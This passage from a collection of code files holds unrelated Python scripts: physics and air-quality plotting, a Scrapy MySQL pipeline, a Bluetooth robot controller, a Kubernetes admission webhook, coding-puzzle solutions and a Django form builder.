fPads1 = TPad(\"pad1\", \"\", 0.00, 0.4, 0.99, 0.99)\n fPads2 = TPad(\"pad2\", \"\", 0.00, 0.00, 0.99, 0.4)\n fPads1.SetBottomMargin(0.02);\n fPads1.SetTicks(1,1);\n fPads1.SetTicks(1,1);\n\n fPads2.SetTopMargin(0.02);\n fPads2.SetBottomMargin(0.4)\n #fPads1.SetBottomMargin(0)\n #fPads2.SetTopMargin(0)\n #fPads2.SetBottomMargin(0.4)\n c1.cd()\n fPads1.Draw()\n fPads2.Draw()\n fPads1.cd()\n fPads2.SetGridy()\n fPads1.SetGridx()\n fPads2.SetGridx()\n\n \n h_up.SetTitle(uncertainty_hist_name)\n h_up.SetLineWidth(2)\n h_center.SetLineWidth(2)\n h_up.GetXaxis().SetLabelSize(0.0)\n h_down.SetLineWidth(2)\n h_up.SetLineStyle(7)\n h_down.SetLineStyle(7)\n\n h_up.Draw(\"hist\")\n h_center.Draw(\"hist same\")\n h_down.Draw(\"hist same\")\n\n leg3 = TLegend(0.7,0.7,0.9,0.9)\n leg3.AddEntry(h_up, \"up\")\n leg3.AddEntry(h_center, \"center\")\n leg3.AddEntry(h_down, \"down\")\n\n bin_width_signal = ['500', '600', '700', '1000', 'inf']\n bin_width_control = ['200', '300', '400', '500']\n #h_up.Print(\"all\")\n x1 = array('d',(4, 4))\n y1 = array('d',(0, 1.1*h_up.GetMaximum()))\n g1 = TGraph(2, x1, y1)\n g1.SetLineColor(1)\n g1.SetLineStyle(2)\n g1.SetLineWidth(2)\n\n x2 = array('d',(8, 8))\n y2 = array('d',(0, 1.1*h_up.GetMaximum()))\n g2 = TGraph(2, x2, y2)\n g2.SetLineColor(1)\n g2.SetLineStyle(2)\n g2.SetLineWidth(2)\n\n\n latex1 = TLatex()\n latex1.SetNDC();\n latex1.SetTextAngle(0);\n latex1.SetTextColor(1);\n latex1.SetTextSize(0.05);\n if which_region == 'signal':\n g1.Draw(\"C \")\n g2.Draw(\"C \")\n latex1.DrawLatex(0.13, 0.4, \"30 Gev < M_{l#gamma} < 80 GeV\");\n latex1.DrawLatex(0.38, 0.4, \"80 Gev < M_{l#gamma} < 130 GeV\");\n latex1.DrawLatex(0.65, 0.4, \"130 Gev < M_{l#gamma} < inf GeV\");\n print('max : ',h_up.GetMaximum())\n #h_up.SetMaximum(1.3 * h_up.GetMaximum())\n #maximum = 1.5 * h_up.GetMaximum()\n leg3.Draw()\n #fPads1.Update()\n fPads2.cd()\n\n nominal = h_center.Clone(\"nominal\")\n nomNoErr = nominal.Clone(\"nomNoErr\")\n for i in range(nomNoErr.GetNbinsX()) :\n nomNoErr.SetBinError(i+1,0)\n tmp_h_up = h_up.Clone()\n tmp_h_down = h_down.Clone()\n nominal.SetTitle(\"\")\n\n tmp_h_up.Divide(nominal)\n print('tmp_max : ',tmp_h_up.GetMaximum())\n tmp_h_down.Divide(nominal)\n nominal.Divide(nomNoErr)\n for i in range(nominal.GetNbinsX()) :\n nominal.SetBinError(i+1,nominal.GetBinError(i+1)/nomNoErr.GetBinContent(i+1))\n nominal.SetFillStyle(3001)\n nominal.SetFillColor(16)\n nominal.GetYaxis().SetLabelSize(0.07)\n nominal.GetYaxis().SetNdivisions(404)\n nominal.GetXaxis().SetTitle(var_name+\" [GeV]\")\n nominal.GetXaxis().SetLabelSize(0.1)\n nominal.GetXaxis().SetTitleFont(12)\n nominal.GetXaxis().SetTitleSize(0.1)\n #cout<GetMinimum()-0.1<<\" \"<GetMaximum()+0.05< xlrd:\n return xlrd.open_workbook(self._filename)\n\n def get_sheets(self) -> xlrd:\n return self._workbook.sheets()\n\n def get_cities_states_lats_longs(self) -> tuple:\n #preserve list order dont sort yet\n sheet = self.get_sheets()[0]\n cities = sheet.col_values(colx=0)[1:]\n states = sheet.col_values(colx=3)[1:] \n latitudes = sheet.col_values(colx=8)[1:] #N/S\n longitudes = sheet.col_values(colx=9)[1:] #E/W\n zip_code = sheet.col_values(colx=17)[1:]\n return (cities,states,latitudes,longitudes,zip_code)\n\n def map_cites_states_lats_longs(self) -> dict:\n container = OrderedDict()\n cities,states,lats,longs, zip_code = self.get_cities_states_lats_longs()\n for i,_ in enumerate(cities):\n container[cities[i] +','+ states[i]] = {'City':cities[i],\\\n 'State':states[i],'Latitude':lats[i], \\\n 'Longitude':longs[i],'Zipcode':zip_code[i]}\n return container\n\n \n\n\n \n\n\n \n\n \n\n\n\n\n#https://xlrd.readthedocs.io/en/latest/api.html","sub_path":"covid19_docker_redis_flask_webscrape/covid_19_docker_plot.py","file_name":"covid_19_docker_plot.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"370428785","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nclass TutorialPipeline(object):\n def process_item(self, item, spider):\n return item\n\n#将数据存储到mysql数据库\nfrom twisted.enterprise import adbapi\nimport MySQLdb\nimport MySQLdb.cursors\nfrom scrapy import log\n\nclass MySQLStorePipeline(object):\n def __init__(self, dbpool):\n self.dbpool = dbpool\n\n #数据库参数\n @classmethod\n def from_settings(cls, settings):\n dbargs = dict(\n host=settings['MYSQL_HOST'],\n db=settings['MYSQL_DBNAME'],\n user=settings['MYSQL_USER'],\n passwd=settings['MYSQL_PASSWD'],\n charset='utf8',\n cursorclass = MySQLdb.cursors.DictCursor,\n use_unicode= True,\n )\n dbpool = adbapi.ConnectionPool('MySQLdb', **dbargs)\n return cls(dbpool)\n\n\n # #数据库参数\n # def __init__(self):\n # dbargs = dict(\n # host = '10.39.211.198',\n # db = 'test',\n # user = 'root',\n # passwd = 'password',\n # cursorclass = MySQLdb.cursors.DictCursor,\n # charset = 'utf8',\n # use_unicode = True\n # )\n # self.dbpool = adbapi.ConnectionPool('MySQLdb',**dbargs)\n\n '''\n The default pipeline invoke function\n '''\n def process_item(self, item,spider):\n res = self.dbpool.runInteraction(self.insert_into_table,item)\n res.addErrback(self.handle_error)\n return item\n #插入的表,此表需要事先建好\n def insert_into_table(self,conn,item):\n conn.execute('insert into chembridge(catalog, amount, price,qty) values(%s,%s,%s,%s)', (\n item['catalog'],\n item['amount'],\n # item['star'][0],\n item['price'],\n item['qty']\n ))\n def handle_error(self,e):\n log.err(e)","sub_path":"tutorial/tutorial/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"325170688","text":"\nimport json\nimport gzip\nimport sys\nfrom PIL import Image, ImageFilter\nimport requests\nfrom io import BytesIO\nimport os.path\nimport time\n\nrecipes_without_image_file = 'recipe_without_image.txt'\n\n\nwith gzip.open('merged_edeka.json.gz') as zipfile:\n json_file = json.load(zipfile)\n\nfor idx, recipe in enumerate(json_file[\"recipes\"]):\n seoTitle = recipe[\"seoTitle\"]\n filename_small = f'../static/images/recipe/{seoTitle}_small.jpg'\n filename_big = f'../static/images/recipe/{seoTitle}_big.jpg'\n if not os.path.exists(filename_small):\n # 480px width\n picture_small = recipe[\"media\"][\"images\"][\"ratio_1:1\"][\"url\"][\"medium\"]\n response = requests.get(picture_small)\n if response.status_code == 404:\n with open(recipes_without_image_file, 'a') as f:\n f.write(f'{recipe[\"seoTitle\"]}\\n')\n continue\n with open(filename_small, 'wb') as f:\n f.write(response.content)\n time.sleep(1)\n \n if not os.path.exists(filename_big):\n # 768px width\n # if recipe[\"media\"][\"images\"][\"ratio_16:9\"]:\n # picture_big = recipe[\"media\"][\"images\"][\"ratio_16:9\"][\"url\"][\"mediumLarge\"]\n # response = requests.get(picture_big)\n # with open(filename_big, 'wb') as f:\n # f.write(response.content)\n # time.sleep(2)\n # else:\n #Open existing image\n image_org = Image.open(filename_small)\n image_big = image_org.resize((768,768))\n image_org = image_org.resize((432,432))\n image_big = image_big.filter(ImageFilter.GaussianBlur(8))\n image_big.paste(image_org, ((int)(768/2-432/2), (int)(768/2-432/2)))\n area = (0, int((768-432)/2), 768, 432+int((768-432)/2))\n image_big = image_big.crop(area)\n image_big.save(filename_big, \"JPEG\")\n print(f'recipe {idx}/{len(json_file[\"recipes\"])}')\nprint(\"done\")\n \n","sub_path":"import/02_download_recipe_images.py","file_name":"02_download_recipe_images.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"112095249","text":"from flask import Flask, render_template, request\nimport scraper_func\napp = Flask(__name__)\n\n@app.route('/')\ndef url_entry():\n return render_template('url_entry.html')\n\n@app.route('/links', methods = ['POST', 'GET'])\ndef links():\n if request.method == 'POST':\n url = request.form['url']\n output = scraper_func.scraper(url)\n return render_template(\"links.html\", result = output)\n\n if request.method == 'GET':\n return \"Go back to http://127.0.0.1:5000/\"","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"366790469","text":"import msvcrt\nimport struct\nfrom twisted.internet import task\nfrom twisted.internet import reactor\nimport bluetooth\n\ndef getKey():\n '''\n Get the key code of the key that is being held down,\n otherwise return False\n '''\n if msvcrt.kbhit():\n return ord(msvcrt.getch()) #Return the key code\n else:\n return False\n\ndef sendCommand(sock, command):\n '''\n Given a socket + command, and assuming that the command is an int\n Will convert int to bytes and send to socket\n '''\n print(command)\n sock.send(command.to_bytes(1, byteorder='big'))\n\ndef mainLoop(sock, keyDict):\n keyCode = getKey()\n command = keyDict.get(keyCode, False)\n if command == -1:\n print(\"Exit\")\n reactor.stop()\n elif command:\n print(command)\n sendCommand(sock, command) \n else:\n pass\n\n#KEY CODES\nESC = 27\nSPECIAL_KEYS = 224\n\n#8 Directional\nQCODE = 113\nWCODE = 119\nECODE = 101\nACODE = 97\nDCODE = 100\nZCODE = 122\nXCODE = 120\nCCODE = 99\n\n\"\"\"\n4 bit representations of directions\n1000 = UP == 8\n0100 = DOWN == 4\n0010 = RIGHT == 2\n0001 = LEFT == 1\nCan also be combined\n1010 = UP + RIGHT == 10\nWill use bitwise operations in arduino program to determine how to turn\n\"\"\"\n#This dictionary maps key codes to binary representations\ncommandMap = {\n QCODE: 9,\n WCODE: 8,\n ECODE: 10,\n ACODE: 1,\n DCODE: 2,\n ZCODE: 5,\n XCODE: 4,\n CCODE: 6,\n ESC: -1\n }\n\nrefreshInterval = .1 #Seconds\nHC06Address = r\"98:D3:31:F6:04:C8\"\nport = 1 #I'm not quite sure what port this is referring to, but it works...\ntry:\n sock=bluetooth.BluetoothSocket( bluetooth.RFCOMM )\n sock.connect((HC06Address, port))\n print(\"Connection to {0} established\".format(HC06Address))\n l = task.LoopingCall(lambda: mainLoop(sock, commandMap))\n l.start(refreshInterval)\n reactor.run()\nexcept:\n print(\"Connection to {0} failed\".format(HC06Address))","sub_path":"Python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"289301268","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nfrom marionette import Wait\n\nfrom mtbf_driver.MtbfTestCase import GaiaMtbfTestCase\nfrom gaiatest.apps.search.app import Search\nfrom mtbf_driver.mtbf_apps.settings.app import MTBF_Settings\n\n\nclass TestBrowserClearHistory(GaiaMtbfTestCase):\n\n def setUp(self):\n GaiaMtbfTestCase.setUp(self)\n self.data_layer.enable_wifi()\n self.connect_to_local_area_network()\n\n self.test_url = self.marionette.absolute_url('mozilla.html')\n\n def test_browser_clear_history(self):\n \"\"\"\n https://moztrap.mozilla.org/manage/cases/?filter-id=3582\n \"\"\"\n search = Search(self.marionette)\n search.launch()\n browser = search.go_to_url(self.test_url)\n browser.switch_to_content()\n Wait(self.marionette).until(lambda m: m.title == 'Mozilla')\n\n self.device.touch_home_button()\n\n search.launch()\n Wait(self.marionette).until(lambda m: search.history_items_count > 0)\n self.assertGreater(search.history_items_count, 0)\n\n settings = MTBF_Settings(self.marionette)\n settings.launch()\n settings.go_back()\n browsing_privacy = settings.open_browsing_privacy_settings()\n\n browsing_privacy.tap_clear_browsing_history()\n browsing_privacy.tap_clear()\n\n self.device.touch_home_button()\n search.launch()\n search.wait_for_history_to_load(number_of_items=0)\n self.assertEqual(0, search.history_items_count)\n\n def tearDown(self):\n self.data_layer.disable_cell_data()\n GaiaMtbfTestCase.tearDown(self)\n","sub_path":"mtbf_driver/tests/mtbf/browser/test_mtbf_browser_clear_browsing_history.py","file_name":"test_mtbf_browser_clear_browsing_history.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"318982952","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 21 10:55:23 2018\r\n\r\n@author: s1731217\r\n\"\"\"\r\n\r\n# =============================================================================\r\n# Plotting\r\n# =============================================================================\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.patches as mpatches\r\n#import openpyxl\r\nimport xlrd\r\nfrom matplotlib.dates import DateFormatter, MonthLocator, WeekdayLocator, DayLocator, MONDAY, YEARLY\r\nimport matplotlib.dates as dates\r\nfrom pylab import *\r\nimport numpy as np\r\nimport iris\r\n\r\n# =============================================================================\r\n# loading data (excel)\r\n# =============================================================================\r\ndata = xlrd.open_workbook('/exports/csce/datastore/geos/users/s1731217/output_ukca/u-av256/plotting_scripts/model_evaluation/2014_06_total.xlsx')\r\n\r\n#data = xlrd.open_workbook('Z:/output_ukca/observation/beijing/test.xlsx')\r\ntable1 = data.sheet_by_name('PM2.5')\r\n\r\n#\r\ny_no2_beijing = table1.col_values(0)[1:] \r\ny_no2_shijiazhuang = table1.col_values(1)[1:] \r\ny_no2_shanghai = table1.col_values(2)[1:] \r\ny_no2_nanjing = table1.col_values(3)[1:] \r\ny_no2_guangzhou = table1.col_values(4)[1:] \r\ny_no2_hongkong = table1.col_values(5)[1:] \r\n\r\n#x_cn = range(1, 745), for 31d; if for June (30d), it is range(1,721)\r\n#x_utc = range (10, 754)\r\n#example: UTC time: 00:30, China time: 08:30\r\nx_cn = np.arange(1.5, 721.5)\r\nx_utc = np.arange(9.5, 729.5)\r\n# =============================================================================\r\n# loading data (cube); u-av256: nudged; u-av257: non-nudged\r\n# =============================================================================\r\nfilename_no2 = '/exports/csce/datastore/geos/users/s1731217/output_ukca/u-av257/dumped_pp_files/June/pm2.5.pp' # pm1\r\nfilename2_no2 = '/exports/csce/datastore/geos/users/s1731217/output_ukca/u-av256/dumped_pp_files/June/pm2.5.pp' # pm1 (nudging)\r\n\r\ncube_no2 = iris.load(filename_no2) \r\ncube2_no2 = iris.load(filename2_no2) #cube2: nudging\r\n\r\n# unit: ug/m3\r\ncube_no2_unit_beijing = cube_no2[0]*1.185*1.0e9\r\ncube_no2_unit_shijiazhuang = cube_no2[0]*1.181*1.0e9\r\ncube_no2_unit_shanghai = cube_no2[0]*1.185*1.0e9\r\ncube_no2_unit_nanjing = cube_no2[0]*1.185*1.0e9\r\ncube_no2_unit_guangzhou = cube_no2[0]*1.169*1.0e9\r\ncube_no2_unit_hk = cube_no2[0]*1.169*1.0e9\r\n\r\n#nudged data : unit2\r\ncube_no2_unit2_beijing = cube2_no2[0]*1.185*1.0e9\r\ncube_no2_unit2_shijiazhuang= cube2_no2[0]*1.181*1.0e9\r\ncube_no2_unit2_shanghai = cube2_no2[0]*1.185*1.0e9\r\ncube_no2_unit2_nanjing = cube2_no2[0]*1.185*1.0e9\r\ncube_no2_unit2_guangzhou = cube2_no2[0]*1.169*1.0e9\r\ncube_no2_unit2_hk = cube2_no2[0]*1.169*1.0e9\r\n\r\ncube_beijing_no2 = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit_beijing, [('latitude', 39.90), ('longitude', 116.41)])\r\ncube_shijiazhuang_no2 = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit_shijiazhuang, [('latitude', 38.04), ('longitude', 114.51)])\r\ncube_shanghai_no2 = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit_shanghai, [('latitude', 31.23), ('longitude', 121.47)])\r\ncube_nanjing_no2 = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit_nanjing, [('latitude', 32.06), ('longitude', 118.80)])\r\ncube_guangzhou_no2 = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit_guangzhou, [('latitude', 23.13), ('longitude', 113.26)])\r\ncube_hongkong_no2 = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit_hk, [('latitude', 22.33), ('longitude', 114.19)])\r\n\r\ncube_beijing_no2_nudge = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit2_beijing, [('latitude', 39.90), ('longitude', 116.41)])\r\ncube_shijiazhuang_no2_nudge = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit2_shijiazhuang, [('latitude', 38.04), ('longitude', 114.51)])\r\ncube_shanghai_no2_nudge = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit2_shanghai, [('latitude', 31.23), ('longitude', 121.47)])\r\ncube_nanjing_no2_nudge = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit2_nanjing, [('latitude', 32.06), ('longitude', 118.80)])\r\ncube_guangzhou_no2_nudge = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit2_guangzhou, [('latitude', 23.13), ('longitude', 113.26)])\r\ncube_hongkong_no2_nudge = iris.analysis.interpolate.extract_nearest_neighbour(cube_no2_unit2_hk, [('latitude', 22.33), ('longitude', 114.19)])\r\n\r\n# =============================================================================\r\n# PM1 (model) & PM2.5 (obs) plotting\r\n# =============================================================================\r\n#beijing\r\nplt.figure(figsize=(24, 15), facecolor='white')\r\npic = plt.subplot(6,1,1)\r\nbeijing_no2 = pic.plot(x_utc, cube_beijing_no2.data, linewidth=4, color = 'k')\r\nbeijing_no2_nudging = pic.plot(x_utc, cube_beijing_no2_nudge.data, linewidth=4, color = 'sienna')\r\nobs_no2 = pic.plot(x_cn, y_no2_beijing, linewidth = 4, label = 'OBS', color = 'red')\r\n\r\nticks = np.arange(1, 721, 24) \r\nlabels = range (1, 31)\r\npic.set_xticks(ticks)\r\npic.set_xticklabels(labels)\r\n#plt.title('NO2 in Beijing (10/11-10/12) 2014')\r\n#plt.xlabel('Day')\r\nplt.ylabel(' PM Beijing')\r\n#plt.legend(loc = 1)\r\n#red_patch1 = mpatches.Patch(color='red', label='Beijing')\r\n#plt.legend(handles=[red_patch1])\r\n\r\nplt.grid(linestyle = '--')\r\n# pic.set_xticklabels(day_list)\r\n\r\nfor label in pic.get_xticklabels():\r\n label.set_rotation(45)\r\n\r\n#shijiazhuang \r\npic = plt.subplot(6,1,2)\r\nshijiazhuang_no2 = pic.plot(x_utc, cube_shijiazhuang_no2.data, linewidth=4, color = 'k')\r\nshijiazhuang_no2_nudging = pic.plot(x_utc, cube_shijiazhuang_no2_nudge.data, linewidth=4, color = 'sienna')\r\nobs_no2 = pic.plot(x_cn, y_no2_shijiazhuang, linewidth = 4, label = 'OBS', color = 'red')\r\n\r\nticks = np.arange(1, 721, 24) \r\nlabels = range (1, 31)\r\npic.set_xticks(ticks)\r\npic.set_xticklabels(labels)\r\n#plt.title('NO2 in shijiazhuang (10/11-10/12) 2014')\r\n#plt.xlabel('Day')\r\nplt.ylabel(' PM Shijiazhuang')\r\n#plt.legend(loc = 1)\r\n\r\nplt.grid(linestyle = '--')\r\n# pic.set_xticklabels(day_list)\r\n#red_patch2 = mpatches.Patch(color='red', label='Shijiazhuang')\r\n#plt.legend(handles=[red_patch2])\r\n\r\nfor label in pic.get_xticklabels():\r\n label.set_rotation(45)\r\n\r\n#shanghai \r\npic = plt.subplot(6,1,3)\r\nshanghai_no2 = pic.plot(x_utc, cube_shanghai_no2.data, linewidth=4, color = 'k')\r\nshanghai_no2_nudging = pic.plot(x_utc, cube_shanghai_no2_nudge.data, linewidth=4, color = 'sienna')\r\nobs_no2 = pic.plot(x_cn, y_no2_shanghai, linewidth = 4, label = 'OBS', color = 'red')\r\n\r\nticks = np.arange(1, 721, 24) \r\nlabels = range (1, 31)\r\npic.set_xticks(ticks)\r\npic.set_xticklabels(labels)\r\n#plt.title('NO2 in shanghai (10/11-10/12) 2014')\r\n#plt.xlabel('Day')\r\nplt.ylabel(' PM Shanghai')\r\n#plt.legend(loc = 1)\r\n#red_patch3 = mpatches.Patch(color='red', label='Shanghai')\r\n#plt.legend(handles=[red_patch3])\r\n\r\nplt.grid(linestyle = '--')\r\n# pic.set_xticklabels(day_list)\r\n\r\nfor label in pic.get_xticklabels():\r\n label.set_rotation(45)\r\n\r\n#nanjing \r\npic = plt.subplot(6,1,4)\r\nnanjing_no2 = pic.plot(x_utc, cube_nanjing_no2.data, linewidth=4, color = 'k')\r\nnanjing_no2_nudging = pic.plot(x_utc, cube_nanjing_no2_nudge.data, linewidth=4, color = 'sienna')\r\nobs_no2 = pic.plot(x_cn, y_no2_nanjing, linewidth = 4, label = 'OBS', color = 'red')\r\n\r\nticks = np.arange(1, 721, 24) \r\nlabels = range (1, 31)\r\npic.set_xticks(ticks)\r\npic.set_xticklabels(labels)\r\n#plt.title('NO2 in nanjing (10/11-10/12) 2014')\r\n#plt.xlabel('Day')\r\nplt.ylabel(' PM Nanjing')\r\n#plt.legend(loc = 1)\r\n#red_patch4 = mpatches.Patch(color='red', label='Nanjing')\r\n#plt.legend(handles=[red_patch4])\r\n\r\nplt.grid(linestyle = '--')\r\n# pic.set_xticklabels(day_list)\r\n\r\nfor label in pic.get_xticklabels():\r\n label.set_rotation(45)\r\n \r\n#guangzhou\r\npic = plt.subplot(6,1,5)\r\nguangzhou_no2 = pic.plot(x_utc, cube_guangzhou_no2.data, linewidth=4, color = 'k')\r\nguangzhou_no2_nudging = pic.plot(x_utc, cube_guangzhou_no2_nudge.data, linewidth=4, color = 'sienna')\r\nobs_no2 = pic.plot(x_cn, y_no2_guangzhou, linewidth = 4, label = 'OBS', color = 'red')\r\n\r\nticks = np.arange(1, 721, 24) \r\nlabels = range (1, 31)\r\npic.set_xticks(ticks)\r\npic.set_xticklabels(labels)\r\n#plt.title('NO2 in guangzhou (10/11-10/12) 2014')\r\n#plt.xlabel('Day')\r\nplt.ylabel(' PM Guangzhou')\r\n#plt.legend(loc = 1)\r\n#red_patch5 = mpatches.Patch(color='red', label='Guangzhou')\r\n#plt.legend(handles=[red_patch5])\r\n\r\nplt.grid(linestyle = '--')\r\n# pic.set_xticklabels(day_list)\r\n\r\nfor label in pic.get_xticklabels():\r\n label.set_rotation(45)\r\n\r\n#hongkong\r\npic = plt.subplot(6,1,6)\r\nhongkong_no2 = pic.plot(x_utc, cube_hongkong_no2.data, linewidth=4, label = 'Model: PM1 (ug/m3)', color = 'k')\r\nhongkong_no2_nudging = pic.plot(x_utc, cube_hongkong_no2_nudge.data, linewidth=4, label = 'Nudged Model: PM1 (ug/m3) ', color = 'sienna')\r\nobs_no2 = pic.plot(x_cn, y_no2_hongkong, linewidth = 4, label = 'Obs PM2.5 (ug/m3) in June', color = 'red')\r\n\r\nticks = np.arange(1, 721, 24) \r\nlabels = range (1, 31)\r\npic.set_xticks(ticks)\r\npic.set_xticklabels(labels)\r\n#plt.title('NO2 (10/11-10/12) 2014')\r\n#plt.xlabel('Day')\r\nplt.ylabel(' PM Hong Kong')\r\n#plt.legend(loc = 1)\r\n#red_patch = mpatches.Patch(color='red', label='HongKong')\r\n#plt.legend(handles=[red_patch])\r\n\r\nplt.grid(linestyle = '--')\r\n# pic.set_xticklabels(day_list)\r\n\r\nfor label in pic.get_xticklabels():\r\n label.set_rotation(45) \r\n \r\n#label\r\n#plt.legend(bbox_to_anchor=(0.03, -0.09, 0.9, -0.09), ncol= 4, mode=\"expand\") # bbox_to_anchor=(x0, y0, x, y) \r\nplt.legend(bbox_to_anchor=(0.1, -0.09, 0.8, -0.09), ncol= 4, mode=\"expand\") # bbox_to_anchor=(x0, y0, x, y) \r\n\r\n#plt.tight_layout()\r\nplt.subplots_adjust(left=0.06, bottom=0.1, right=0.94, top=0.95, hspace=0.2, wspace=0.2)\r\nplt.savefig('/exports/csce/datastore/geos/users/s1731217/output_ukca/u-av256/plotting_scripts/model_evaluation/model_evaluation_pm.png', dpi=600, transparent=True)\r\nplt.show()\r\n","sub_path":"u-av256/plotting_scripts/model_evaluation/model_evaluation_pm.py","file_name":"model_evaluation_pm.py","file_ext":"py","file_size_in_byte":10033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"350511134","text":"from flask import Flask, request, jsonify\nadmission_controller = Flask(__name__)\n@admission_controller.route('/validate/deployments', methods=['POST'])\ndef deployment_webhook():\n request_info = request.get_json()\n if request_info[\"request\"][\"object\"][\"metadata\"][\"labels\"].get(\"allow\"):\n return admission_response(True, \"Allow label exists\")\n return admission_response(False, \"Not allowed without allow label\")\ndef admission_response(allowed, message):\n return jsonify({\"response\": {\"allowed\": allowed, \"status\": {\"message\": message}}})\nif __name__ == '__main__':\n admission_controller.run(host='0.0.0.0', port=443, ssl_context=(\"server.crt\", \"server.key\"))","sub_path":"validating_controller/image/admission_controller.py","file_name":"admission_controller.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"335308857","text":"#ME\r\n\r\nclass Solution:\r\n def uncommonFromSentences(self, A: str, B: str) -> List[str]:\r\n d={}\r\n a=[]\r\n A=A.split(' ')\r\n B=B.split(' ')\r\n for s in A:\r\n d[s]=d.get(s,0)+1\r\n for s in B:\r\n d[s]=d.get(s,0)+1\r\n for key,value in d.items():\r\n if value==1:\r\n a.append(key)\r\n return a","sub_path":"leetcode_solution/leetcode类别/10.1哈希/简单/884. 两句话中的不常见单词.py","file_name":"884. 两句话中的不常见单词.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"103960368","text":"from __future__ import print_function\nimport goslate\nimport sys\ngs=goslate.Goslate()\ndef phrase_wise(filePath):\n a=open(filePath,\"r\").read()\n lines = a.splitlines()\n need = []\n for i in lines:\n if len(i)>0:\n if not(i[0].isdigit()):\n need.append(i)\n return need\n\ndef word_wise(filePath):\n a=open(filePath,\"r\").read()\n lines = a.splitlines()\n need = []\n for i in lines:\n if len(i)>0:\n if not i[0].isdigit():\n \tfor j in i.split():\n \t need.append(i+\" \")\n return need\n\ndef fullSentence_wise(filePath):\n a=open(filePath,\"r\").read()\n lines = a.splitlines()\n need = \"\"\n for i in lines:\n need = need + i + \" \"\n return [need]\n\ndef translate(need,langid):\n translated=[]\n for i in need:\n translated.append(gs.translate(i,langid))\n return translated\n\nprint(sys.argv[1][:-4])\n#print phrase_wise(sys.argv[0])\nfp = open(\"result_phrase.txt\",\"w\")\nfor i in phrase_wise(sys.argv[1]):\n if i[0]!='<':\n print((translate([i],sys.argv[2])[0].encode('utf-8')),file=fp)\nfp.close()\nfp2 = open(\"result_sentence.txt\",\"w\")\nfor i in fullSentence_wise(sys.argv[1]):\n if i[0]!='<':\n print((translate([i],sys.argv[2])[0].encode('utf-8')),file=fp2)\nfp2.close()\nfp3 = open(\"result_word.txt\",\"w\")\nfor i in word_wise(sys.argv[1]):\n if i[0]!='<':\n print((translate([i],sys.argv[2])[0].encode('utf-8')),file=fp3)\nfp3.close()\n\nexit()\n\n","sub_path":"methodAnalysis/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"2650559","text":"base = 9\ndigits = []\nfor i in range(2,1000):\n digits.append(i)\n for j in range (i,1000,i):\n num = j\n result = 0\n while num >= 1:\n result += int(num % base)\n num = int(num / base)\n if result % i != 0:\n print(digits)\n digits.pop()\n break\n\nprint(digits)\n\n","sub_path":"Topcoder Python/전체탐색/InterestingDigits.py","file_name":"InterestingDigits.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"227821389","text":"from talentos.models import Area, FormularioConhecimento\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, render_to_response\nfrom django.core.context_processors import csrf\nfrom django.conf import settings\n\nclass no_arvore:\n nome = 'nomeArea'\n agrupador = False\n filhos = []\n def __unicode__(self):\n return self.nome\n\ndef gerar_formulario_conhecimento(noPai = None):\n if noPai:\n areas = Area.objects.filter(pai = Area.objects.get(nome=noPai)).order_by('agrupador')\n else:\n areas = Area.objects.filter(pai = None).order_by('agrupador')\n\n lista = []\n for area in areas:\n # import logging\n # logging.debug(noPai)\n if area.agrupador:\n # logging.debug('agrupador')\n # logging.debug(area.nome)\n if Area.objects.filter(pai = Area.objects.get(nome=area.nome)):\n no = no_arvore()\n no.nome = area.nome\n no.agrupador = True\n no.filhos = gerar_formulario_conhecimento(area.nome)\n lista.append(no)\n else:\n no = no_arvore()\n no.nome = area.nome\n no.agrupador = False\n no.filhos = []\n lista.append(no)\n return lista\n\ndef renderizar_formulario_conhecimento(lista, request):\n texto = ''\n\n if lista != []:\n for item in lista:\n if item.agrupador:\n texto += '\\n'\n texto += '\\n
